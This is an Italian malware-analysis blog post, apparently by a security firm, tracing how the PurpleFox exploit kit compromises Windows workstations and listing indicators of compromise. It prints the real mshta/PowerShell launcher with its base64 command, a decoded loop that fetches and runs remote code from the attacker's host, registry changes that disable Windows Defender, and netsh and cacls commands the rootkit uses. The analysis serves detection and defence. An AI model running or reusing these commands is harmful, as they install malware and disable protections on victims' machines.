L’immagine che segue rappresenta lo schema della compromissione osservato durante la nostra analisi:<\/p>\n\n\n\n Dettagli del servizio di Difesa Gestita di Fortgale.<\/a><\/p>\n\n\n\n Un E<\/strong><\/span>xploit Kit<\/strong> \u00e8 un kit di strumenti offensivi utilizzato dai criminali per compromettere le workstation<\/em> durante la navigazione Internet. Il Kit sfrutta solitamente vulnerabilit\u00e0 dei Browser<\/strong> e software come Adobe Flash<\/strong>, Java<\/strong>, Microsoft Silverlight<\/strong>.<\/span><\/p>\n PurpleFox<\/strong> \u00e8 un Exploit Kit il cui obiettivo \u00e8 quello di eseguire codice PowerShell per il download di malware Rootkit<\/em>. Identificato per la prima volta nel 2018, ecco una lista degli articoli tecnici che hanno trattato questa minaccia:<\/p>\n Come gi\u00e0 osservato in precedenti analisi, l’attacco risulta partire durante la navigazione alla pagina web hxxp:\/\/speedjudgmentacceleration[.]com .<\/p>\n Sfruttando una vulnerabilit\u00e0 di Adobe Flash,<\/em> viene avviata la catena di compromissione della postazione tramite il comando:<\/p>\n Decodifica in base64:<\/p>\n Questo comando esegue il download (10 tentativi) e l’avvio di altro codice malevolo presente alla pagina hxxp:\/\/rawcdn[.]githack[.]cyou\/up[.]php?key=1 che contiene ulteriori istruzioni per il payload<\/em> finale.<\/p>\n\n\n\n Lo script comincia con la definizione di un nuovo tipo, all’interno del quale verranno importate le funzioni MsiInstallProduct<\/strong> e MsiSetInternalUI<\/strong> della libreria msi.dll<\/strong>, necessarie per l’installazione del malware <\/em>e per nascondere il pop-up.<\/p>\n\n\n\n Successivamente lo script definisce un blocco di comandi che trasformer\u00e0 in stringa e codificher\u00e0 in base64. L’insieme di comandi viene usato per scaricare ed installare, attraverso MsiInstallProduct<\/strong>, una delle due risorse presenti in $msipathALL<\/strong>. Il tutto viene inserito in un loop che termina soltanto se viene trovato il valore di registro Entrambe le risorse, nonostante presentino estensioni differenti, sono dei file MSI <\/strong>identici (stesso hash). Questo \u00e8 il payload<\/em> finale per la compromissione della postazione:<\/p>\n\n\n\n Prima di eseguire il comando codificato attraverso una nuova chiamata PowerShell, il malware verifica di avere privilegi amministrativi:<\/span><\/p>\n\n\n\n Nel caso di esito negativo, in base all’architettura del sistema, vengono scaricati ed eseguiti script contenenti exploit per effettuare attivit\u00e0 di “local privilege escalation<\/strong><\/em>“.<\/p>\n\n\n\n <\/p>\n\n\n Il Rootkit viene scaricato dagli URL:<\/p>\n Come gi\u00e0 evidenziato in precedenza, i file risultano essere entrambi lo stesso dropper <\/strong>sotto forma di installer <\/em>MSI <\/strong>che, durante il processo di installazione, crea nel sistema i file:<\/p>\n Il malware <\/em>MSI, dopo aver salvato i due file, effettua alcune modifiche al registro di sistema:<\/p>\n Infine, il malware applica delle modifiche al Firewall di sistema (porte TCP e UDP) e modifica i permessi di jscript.dll<\/strong> e cscript.exe<\/strong><\/p>\n\n\n\n Il malware termina le attivit\u00e0 eseguendo il comando: <\/p>\n\n\n\n che consiste nel riavvio del sistema dopo 15 minuti, forzando l’esecuzione della libreria sens.dll<\/strong> alla riaccensione.<\/p>\n Quest’ultima risulta di centrale importanza per la persistenza e il controllo del sistema compromesso. Infatti, sfruttando la creazione di un servizio, il malware viene avviato con la creazione di un processo svchost<\/strong> e la conseguente injection<\/em> dello shellcode .<\/strong><\/p>\n\n\n\n![\"\"](\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/PurpleFox-flow-1024x269.png\")
<\/figure>\n\n\n\nExploit Kit & Purple Fox<\/h2>\n\n\n\n
\n
La Catena di compromissione<\/h2>\n\n\n\n
1. Avvio della compromissione<\/h3>\n\n\n\n
mshta vbscript:createobject(\"wscript.shell\").run(\"PowerShell -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADsAJABpACsAKwApAA0ACgB7AA0ACgBpAGUAeAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwB5AG8AdQAvAHUAcAAuAHAAaABwAD8AawBlAHkAPQAxACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA4ADAADQAKAH0ADQAKAA==\",0)(window.close)<\/code><\/p>\nfor($i=1;$i -le 10;$i++) { iex(new-object net.webclient).downloadstring(\"http:\/\/rawcdn.githack.cyou\/up.php?key=1\") Start-Sleep 180 }<\/span><\/code><\/p>\n2. Modifiche al sistema e controlli<\/h3>\n\n\n\n
![\"\"](\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img1-300x106.png\")
<\/figure><\/div>\n\n\n\nHKCU:\\Software\\7-Zip\\StayOnTop<\/code><\/p>\n\n\n\n![\"\"](\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img2-300x65.png\")
<\/figure><\/div>\n\n\n\n![\"\"](\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img3-300x8.png\")
<\/figure><\/div>\n\n\n\n![\"\"](\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img4-300x8.png\")
<\/figure><\/div>\n\n\n\nSHA-256<\/strong><\/code> d88ce4ccca6bc536dd3b80374be5e3f5ec9ffd96dc122352386dd4ca9af01cfc<\/code><\/p>\n\n\n\n3. Check privilegi amministrativi<\/h3>\n\n\n\n
![\"\"](\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img6-300x31.png\")
<\/figure><\/div>\n\n\n\nx32<\/strong><\/code> hxxp:\/\/rawcdn[.]githack[.]cyou\/up[.]php?key=3<\/code>x64<\/code><\/strong> hxxp:\/\/rawcdn[.]githack[.]cyou\/up[.]php?key=4<\/code><\/p>\n\n\n\n![\"\"](\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img5-300x23.png\")
<\/figure><\/div>\n\n\n\n![\"\"](\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img7-300x127.png\")
<\/figure><\/div>\n\n\n\n4. Il ruolo del file MSI<\/h3>\n\n\n
\n
hxxp:\/\/rawcdn[.]githack[.]cyou\/up.php?key=2<\/code><\/li>\nhxxp:\/\/rawcdn[.]githack[.]com\/x7hGFE28oiG8kDre\/BGuoFr0ACb9E0frq\/afb90fd8276b3530cf1e526e60f8e1d61077e2a5\/M001.jpg<\/code><\/li>\n<\/ul>\n\n
\n
HKCU:\\Software\\7-Zip\\StayOnTop<\/code> che verr\u00e0 usato come controllo per la verifica dell’avvenuta installazione<\/li>\nHKCU\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware
HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware<\/code><\/li>\nHKLM\\System\\CurrentControlSet\\Control\\SessionManager\\PendingFileRenameOperations<\/code>\\??\\C:\\Windows\\AppPatch\\Acpsens.dll, ,<\/code>\\??\\C:\\Windows\\system32\\sens.dll, \\??\\C:\\Windows\\AppPatch\\Acpsens.dll,<\/code>\\??\\C:\\Windows\\system32\\sens.dll, ,<\/code>\\??\\C:\\Windows\\.xml, \\??\\C:\\Windows\\system32\\sens.dll, <\/code>\\??\\C:\\Windows\\AppPatch\\Ke583427.xsl, ,<\/code>\\??\\C:\\Windows\\.ini, \\??\\C:\\Windows\\AppPatch\\Ke583427.xsl<\/code><\/li>\n<\/ul>\n\n\n\n5. Modifiche al sistema<\/h3>\n\n\n\n
\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filterlist name=Filter1<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1<\/code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static set policy name=qianye assign=y<\/code>
\"C:\\Windows\\SysWOW64\\takeown.exe\" \/f C:\\Windows\\system32\\jscript.dll<\/code>\"C:\\Windows\\SysWOW64\\cacls.exe\" C:\\Windows\\system32\\jscript.dll \/E \/P everyone:N<\/code>\"C:\\Windows\\SysWOW64\\takeown.exe\" \/f C:\\Windows\\syswow64\\jscript.dll<\/code>\"C:\\Windows\\SysWOW64\\cacls.exe\" C:\\Windows\\syswow64\\jscript.dll \/E \/P everyone:N<\/code>\"C:\\Windows\\SysWOW64\\takeown.exe\" \/f C:\\Windows\\system32\\cscript.exe<\/code>\"C:\\Windows\\SysWOW64\\cacls.exe\" C:\\Windows\\system32\\cscript.exe \/E \/P everyone:N<\/code>\"C:\\Windows\\SysWOW64\\takeown.exe\" \/f C:\\Windows\\syswow64\\cscript.exe<\/code>\"C:\\Windows\\SysWOW64\\cacls.exe\" C:\\Windows\\syswow64\\cscript.exe \/E \/P everyone:N<\/code> <\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Sleep -Seconds 900; Restart-Computer -Force<\/code> <\/p>\n\n\n\nIndicatori di Compromissione<\/h2>\n\n\n\n
SHA-256<\/h3>\n\n\n\n
\n
d88ce4ccca6bc536dd3b80374be5e3f5ec9ffd96dc122352386dd4ca9af01cfc<\/code> MSI installer<\/strong><\/p>\n<\/li>\n9845e02032d02130bde3ffe2a16ec9706893aa9c8db5712beed6f129a74ffb35<\/code> sens.dll (x64)<\/strong> – VirusTotal<\/a><\/p>\n<\/li>\n